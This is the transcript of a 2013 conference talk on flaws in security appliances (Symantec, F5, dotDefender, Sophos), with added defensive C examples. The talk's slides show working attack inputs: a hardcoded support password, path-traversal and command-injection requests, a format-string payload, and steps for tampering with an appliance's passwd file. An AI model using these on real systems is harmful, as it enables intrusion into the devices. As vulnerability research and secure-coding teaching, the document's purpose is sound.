Insecurity software

PHDays'13

Alexander Antukh

May 24, 2013

Transcript

  1. Insecurity Software – PHDays 2013
     Version: 1.0
     Author: Alexander Antukh
     Responsible: Alexander Antukh
     Date: 24.05.2013
     Confidentiality: Public

  2. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved

     Agenda
     • Introduction
     • What is Security Software
     • Historical review
     • The Question
     • The Answer
     • Vuln, where art thou?
     • Afterword
     • QA

  3. SEC Consult – Who we are
     [Map: SEC Consult headquarters and offices (Austria, Germany, Lithuania, Singapore) and client regions (USA, Canada, India, Central and Eastern Europe)]
     • Leading international application security consultancy
     • Founded 2002
     • Headquarters near Vienna, Austria
     • Delivery Centers in Austria, Germany, Lithuania and Singapore
     • Strong customer base in Central and Eastern Europe
     • Increasing customer base of clients with global business (esp. out of Top-10 US and European software vendors)
     • 35+ application security experts
     • Industry focus: banks, software vendors, government

  4. Alexander Antukh – Whoami
     • Security consultant
     • Offensive Security Certified Expert
     • Defcon Moscow Local Group Coordinator
     *kidhacker

  5. Agenda (section divider; same list as slide 2)

  6. What is Security Software
     “A generic term referring to any computer program or library whose purpose is to (help to) secure a computer system or a computer network”

  7. What is Security Software
     The keyword in all the security software is…

  8. What is Security Software
     In other words, SS is a piece of “anti-evil” software which makes you feel safe and “anti-bad”

  9. Agenda (section divider; same list as slide 2)

  10. Historical review – Firewall
     Evolution: Packet filter → Stateful FW → App layer FW
     First appearance: 1988
     First *registered* exploit: 1995
     Objective: control network traffic and determine if it’s good enough to pass

  11. Historical review – ID(P)S
     Ceci n‘est pas un firewall... (“This is not a firewall...”)
     First appearance: 1986
     First *registered* hack: 1999
     Objective: monitor for malicious activities or policy violations (heuristics, signatures...)
     ✓ Statistical anomaly-based
     ✓ Signature-based
     ✓ Passive (detection)
     ✓ Reactive (prevention)

  12. Historical review – Anti-spam
     First appearance: Monty Python
     First PoC: 1978
     Industrial scale: 1994 - ...
     CAN-SPAM Act of 2003: spam is legal
     AntiSpam evolution: Del → Keywords → Blacklists → Auth → Protocol analysis → Filtering

  13. Historical review – Anti-sniffing
     First registered hack: 1903 (OSVDB-ID: 79399, 79400) – Nevil Maskelyne
     “… I did it for the lulz”
     Today it’s net configuration, encryption and IDS/IPS

  14. Historical review – Anti-virus
     First „viruses“: 1971
     First viruses: mid-1980s
     First AVs: mid-1980s (CHK4BOMB, BOMBSQUAD, DRPROTECT)
     Virus evolution: Benign → Destructive → $$$$$

  15. Historical review
     AV companies don’t stand still…

  16. Historical review
     … neither do other SS products

  17. Agenda (section divider; same list as slide 2)

  18. The question
     Do you know anybody less boring?
     What if the SS is vulnerable itself?

  19. Déjà vu (slide from PHDays 2012)
     • Reverse engineering
       • Checkpoint – Client side remote command execution (multiple Checkpoint appliances, CVE-2011-1827)
     • Fuzzing
       • F5 FirePass SSL VPN – Remote command execution (CVE-2012-1777)
     • Application testing
       • Microsoft ASP.NET – Authentication bypass (Microsoft Security Bulletin MS11-100 – Critical: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2638420), CVE-2011-3416)
     Security software products will be the target of the trade ... soon!

  20. The answer
     • Symantec Messaging Gateway – Backdoor by design → Code execution
     • F5 BIG-IP – SQL Injection, XXE → Passwords… Root access
     • Applicure dotDefender WAF – Format string vulnerability → Code execution
     • Sophos Web Protection Appliance – LFI, OS Command Injection → Command execution, admin account pwn
     Security software products are the target of the trade ... already!

  21. The answer – Symantec Messaging Gateway v.9.5.x
     “... inbound and outbound messaging security, with effective and accurate real-time antispam and antivirus protection, advanced content filtering, data loss prevention, and email encryption ...”
     SSH?! Remote shell!
     Login: support
     MD5: 52e3bbafc627009ac13caff1200a0dbf
     Password: symantec

  22. The answer – F5 BIG-IP <= 11.2.0
     “... from load balancing and service offloading to acceleration and security, the BIG-IP system delivers agility—and ensures your applications are fast, secure, and available ...”

  23. The answer – F5 BIG-IP <= 11.2.0
     “... from load balancing and service offloading to acceleration and security, the BIG-IP system delivers agility—and ensures your applications are fast, secure, and available ...”
     sam/admin/reports/php/getSettings.php →

  24. The answer – AppliCure dotDefender WAF <= 4.26
     “... dotDefender is a web application security solution (a Web Application Firewall, or WAF) that offers strong, proactive security for your websites and web applications ...”
     Web Attack?

  25. The answer – AppliCure dotDefender WAF <= 4.26
     Error page can be configured in different ways:
     Vars to be added to the body of a custom page:
     • %MAILTO_BLOCK% - email entered in the “Email address for blocked request report” field
     • %RID% - reference ID
     • %IP% - server's IP address
     • %DATE_TIME% - date of blocked request
     Looks nice…

  26. The answer – AppliCure dotDefender WAF <= 4.26
     Format string injection
     • Variables
     • Buffer
     • ...
     • AP_PRINTF() – check for format string vulnerabilities
     “Host: …” – should be <%IP%>
     Algorithm: %666d\xBA\xAD\xBE\xEF…

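The slide's point is that the expanded error page ends up as the format argument of a printf-family call, so anything a client controls that survives into the page (its Host header, where <%IP%> was expected) is parsed for conversion directives. The C program below is an added example, not SEC Consult's or dotDefender's code: it expands the slide's %NAME% variables by literal copying, writes the result with fputs() instead of using it as a format string, and includes a small check that flags a page or header value still carrying a conversion directive. The struct and function names, the sample values and the template text are this example's own constructions.

```c
/* Added example (not SEC Consult's or dotDefender's code): safe expansion of a
 * custom error-page template using the variable names from the slide
 * (%IP%, %RID%, %DATE_TIME%, %MAILTO_BLOCK%). Struct and function names are
 * this example's own. */
#include <stdio.h>
#include <string.h>

struct var { const char *name; const char *value; };

/* Returns 1 if s contains a printf conversion directive: a '%' that is not
 * escaped as "%%". Useful as a guard before any printf-family sink and as a
 * detection rule for request fields (e.g. Host) that get reflected into pages. */
int contains_format_directive(const char *s) {
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; }   /* "%%" is a literal percent */
        return 1;
    }
    return 0;
}

/* Expands %NAME% placeholders by copying bytes. Unknown placeholders and stray
 * '%' pass through unchanged, and substituted values are never re-scanned, so
 * no printf-family function ever interprets the template or a value.
 * Returns the output length, or -1 if out is too small. */
int expand_template(const char *tmpl, const struct var *vars, size_t nvars,
                    char *out, size_t outsz) {
    size_t o = 0;
    const char *p = tmpl;
    while (*p) {
        if (*p == '%') {
            const char *end = strchr(p + 1, '%');
            if (end) {
                size_t len = (size_t)(end - (p + 1));
                const char *val = NULL;
                for (size_t i = 0; i < nvars; i++)
                    if (strlen(vars[i].name) == len &&
                        memcmp(vars[i].name, p + 1, len) == 0)
                        val = vars[i].value;
                if (val) {
                    size_t vl = strlen(val);
                    if (o + vl >= outsz) return -1;
                    memcpy(out + o, val, vl);
                    o += vl;
                    p = end + 1;
                    continue;
                }
            }
        }
        if (o + 1 >= outsz) return -1;
        out[o++] = *p++;
    }
    out[o] = '\0';
    return (int)o;
}

/* The sink. The vulnerable pattern the slide describes is the expanded page
 * being passed AS the format string of an AP_PRINTF()-style call, so a Host
 * header carrying "%666d..." is parsed for conversions. The hardened form
 * treats the page purely as data: */
void render_page(FILE *f, const char *page) {
    fputs(page, f);                /* equivalently: fprintf(f, "%s", page); */
}

int main(void) {
    /* Constructed values: server-side variables plus a hostile Host header. */
    const struct var vars[] = {
        { "IP", "192.0.2.10" }, { "RID", "42" }, { "DATE_TIME", "2013-05-24" },
    };
    const char *tmpl =
        "Request %RID% blocked at %DATE_TIME% by %IP%. Host: %666d\\xBA\\xAD\\xBE\\xEF";
    char page[256];
    if (expand_template(tmpl, vars, 3, page, sizeof page) < 0) return 1;
    if (contains_format_directive(page))
        fprintf(stderr, "warning: page still contains a format directive\n");
    render_page(stdout, page);
    fputc('\n', stdout);
    return 0;
}
```

The warning branch is the detection angle: once the page is only ever written as data, a lingering '%' directive is harmless to the server, but logging it still tells you which client fields are being probed.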
  27. The answer – Sophos Web Protection Appliance <= 3.7.8.1
     “... our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non-technical users...”
     https://<host>/cgi-bin/patience.cgi?id=..
       ?id=../../persist/config/shared.conf%00
       ?id=../../log/ui_access_log%00
     "https://<host>/index.php?section=configuration&c=configuration&STYLE=8514d0a3c2fc9f8d47e2988076778153" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0"
     Passwords!

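The patience.cgi requests above combine a "../" traversal with a trailing %00, which the CGI decodes into a NUL byte so that the C runtime stops reading the path there and the rest of the intended filename is ignored. The program below is an added example, not Sophos's code: it percent-decodes an id parameter, keeps the decoded length instead of trusting strlen(), and refuses anything that is not a single safe path component before joining it to a base directory. The base directory /var/www/patience, the function names and the benign sample id are assumptions made for the example.

```c
/* Added example, not Sophos's code: decode and validate a file id before it is
 * joined to a base directory, rejecting "../" traversal and the embedded NUL
 * produced by %00. Base directory and function names are this example's own. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

static int hexval(int c) {
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Percent-decodes src into dst. The return value is the decoded length, which
 * is the only reliable length: a %00 puts a NUL byte in the middle of dst, so
 * strlen() would under-report it. Returns -1 if dst is too small. */
int url_decode(const char *src, char *dst, size_t dstsz) {
    size_t o = 0;
    for (const char *p = src; *p; p++) {
        if (o + 1 >= dstsz) return -1;
        if (*p == '%' && hexval(p[1]) >= 0 && hexval(p[2]) >= 0) {
            dst[o++] = (char)(hexval(p[1]) * 16 + hexval(p[2]));
            p += 2;
        } else if (*p == '+') {
            dst[o++] = ' ';
        } else {
            dst[o++] = *p;
        }
    }
    dst[o] = '\0';
    return (int)o;
}

/* An id is acceptable only as a single path component: non-empty, no embedded
 * NUL (decoded length must equal strlen), characters from [A-Za-z0-9._-], and
 * neither "." nor "..". A '/' anywhere is rejected, so the slide's
 * "../../persist/config/shared.conf" form never reaches the filesystem. */
int is_safe_id(const char *id, size_t decoded_len) {
    if (decoded_len == 0 || strlen(id) != decoded_len) return 0;
    if (strcmp(id, ".") == 0 || strcmp(id, "..") == 0) return 0;
    for (size_t i = 0; i < decoded_len; i++) {
        unsigned char c = (unsigned char)id[i];
        if (!isalnum(c) && c != '.' && c != '_' && c != '-') return 0;
    }
    return 1;
}

/* Builds "<base>/<id>" only for a validated id. Returns 0 on success, -1 if
 * the id is rejected or the buffer is too small. */
int build_path(const char *base, const char *id, size_t decoded_len,
               char *out, size_t outsz) {
    if (!is_safe_id(id, decoded_len)) return -1;
    int n = snprintf(out, outsz, "%s/%s", base, id);
    return (n < 0 || (size_t)n >= outsz) ? -1 : 0;
}

int main(void) {
    /* Constructed inputs: the slide's traversal string and a benign id. */
    const char *inputs[] = { "../../persist/config/shared.conf%00", "a1b2c3" };
    const char *base = "/var/www/patience";   /* hypothetical base directory */
    for (int i = 0; i < 2; i++) {
        char dec[128], path[256];
        int n = url_decode(inputs[i], dec, sizeof dec);
        if (n < 0 || build_path(base, dec, (size_t)n, path, sizeof path) < 0)
            printf("rejected: %s\n", inputs[i]);
        else
            printf("serving:  %s\n", path);
    }
    return 0;
}
```

Carrying the decoded length through every check is the part that matters for the %00 case: any validation that calls strlen() on the decoded buffer sees only the bytes before the NUL and can be satisfied by a suffix the open() call never sees.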
  28. The answer – Sophos Web Protection Appliance <= 3.7.8.1
     “... our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non-technical users...”
     Diagnostic Tools
     POST /index.php?c=diagnostic_tools HTTP/1.1
     ...
     action=wget&section=configuration&STYLE=<validsessid>&url=%60sleep%205%60

  29. The answer – Sophos Web Protection Appliance <= 3.7.8.1
     “... our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non-technical users...”
     Block page (%%user_workstation%%)
     https://<host>/end-user/index.php?reason=application&client-ip=%20%60sleep+10%60

  30. The answer – Sophos Web Protection Appliance <= 3.7.8.1
     “... our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non-technical users...”
     Local Site List
     POST /index.php?c=local_site_list_editor HTTP/1.1
     ...
     STYLE=<validsessid>&action=save&entries=[{"url"%3a+".'`sleep+10`'",+"range"%3a+"no",+"tld"%3a+"yes",+"valid_range"%3a+"no"}]

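The three requests on slides 28 to 30 (diagnostic-tools wget, block-page client-ip, local site list url) all put a request parameter into a command line that a shell then evaluates, which is why a backtick-quoted sleep runs. The C program below is an added example, not Sophos's code, and serves all three slides: it shows the unsafe string-building pattern for contrast, then validates each parameter for what it is supposed to be (an http(s) URL from a narrow character set, an IPv4 literal) and starts wget through an argv array with no shell in between. The function names, the output path /tmp/diag.out, the allowed URL character set and the sample values are this example's own; fetch_with_wget() is not called from main because it needs network access.

```c
/* Added example, not Sophos's code: parameter validation and shell-free
 * execution for the wget / client-ip / url parameters shown on the slides.
 * Function names, output path and character set are this example's own. */
#include <arpa/inet.h>
#include <ctype.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Detection helper: 1 if s holds a character a POSIX shell would interpret.
 * Useful for log review of parameters such as url= or client-ip=. */
int has_shell_metachar(const char *s) {
    return strpbrk(s, "`$;|&<>(){}'\"\\\n") != NULL;
}

/* Deliberately narrower than RFC 3986: http(s) scheme plus [A-Za-z0-9-._~:/?=&%].
 * The URL is later passed as a single argv element, so this is defence in depth,
 * not the only barrier. */
int is_plausible_url(const char *url) {
    const char *rest;
    if (strncmp(url, "http://", 7) == 0) rest = url + 7;
    else if (strncmp(url, "https://", 8) == 0) rest = url + 8;
    else return 0;
    if (*rest == '\0') return 0;
    for (const char *p = rest; *p; p++) {
        unsigned char c = (unsigned char)*p;
        if (!isalnum(c) && strchr("-._~:/?=&%", c) == NULL) return 0;
    }
    return 1;
}

/* The block page's client-ip parameter must be an IPv4 literal; anything else
 * (the slide's " `sleep 10`") is refused before it can be reflected or used. */
int is_ipv4_literal(const char *s) {
    struct in_addr a;
    return strlen(s) <= 15 && inet_pton(AF_INET, s, &a) == 1;
}

/* Unsafe pattern, for contrast only (never hand the result to system()):
 * the URL is interpolated into a command line, so "`sleep 5`" gets executed. */
int build_shell_command_unsafe(const char *url, char *cmd, size_t cmdsz) {
    int n = snprintf(cmd, cmdsz, "wget -O /tmp/diag.out %s", url);
    return (n < 0 || (size_t)n >= cmdsz) ? -1 : 0;
}

/* Safe pattern: a fixed argv in which the URL is exactly one argument.
 * Returns the argument count (argv[argc] is NULL), or -1 if the URL is rejected. */
int build_wget_argv(const char *url, const char *argv[], size_t max) {
    if (max < 5 || !is_plausible_url(url)) return -1;
    argv[0] = "wget"; argv[1] = "-O"; argv[2] = "/tmp/diag.out"; argv[3] = url;
    argv[4] = NULL;
    return 4;
}

/* Runs wget without a shell; returns its exit status, or -1 on rejection/error. */
int fetch_with_wget(const char *url) {
    const char *argv[5];
    if (build_wget_argv(url, argv, 5) < 0) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) { execvp(argv[0], (char *const *)argv); _exit(127); }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    /* Constructed inputs, decoded from the slides' url=%60sleep%205%60 and
     * client-ip=%20%60sleep+10%60, beside benign values. */
    const char *urls[] = { "http://192.0.2.5/update.tgz", "`sleep 5`" };
    for (int i = 0; i < 2; i++)
        printf("url %-28s plausible=%d shell-meta=%d\n", urls[i],
               is_plausible_url(urls[i]), has_shell_metachar(urls[i]));
    const char *ips[] = { "192.0.2.10", " `sleep 10`" };
    for (int i = 0; i < 2; i++)
        printf("client-ip %-14s ipv4=%d\n", ips[i], is_ipv4_literal(ips[i]));
    return 0;
}
```

The argv route removes the shell entirely, so even a URL that slips past is_plausible_url() reaches wget as one opaque argument; the validators then exist to keep obviously wrong input out of logs and downstream templates rather than to be the last line of defence.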
  31. The answer – Sophos Web Protection Appliance <= 3.7.8.1

  32. Agenda (section divider; same list as slide 2)

  33. Vuln, where art thou?
     • Methods for identifying usable bugs in “Software products”
       • Application testing and Fuzzing
       • Reverse engineering
       • Source code analysis
     • A short note on so called “security scanning” tools

  34. Vuln, where art thou?
     • The workflow for the appliance analysis is pretty simple!
       • get a virtual appliance demo version
       • install the appliance
       • add the .vmdk to another vm and mount it there (or use a linux fs driver that can mount vmdk files)
       • add a new user to /etc/passwd, or change UID/shell/password of existing users (or maybe change the sudoers file, sshd config)
       • start the appliance again and log in :)
       • look at the services that are running (and their configuration)
       • pwnage ;)

  35. Vuln, where art thou?
     *Move two matches to make it three equal squares

  36. Agenda (section divider; same list as slide 2)

  37. And now for something completely different
     Sometimes it’s easier to find the vulnerability than might be expected . . .
     *doesn’t exist yet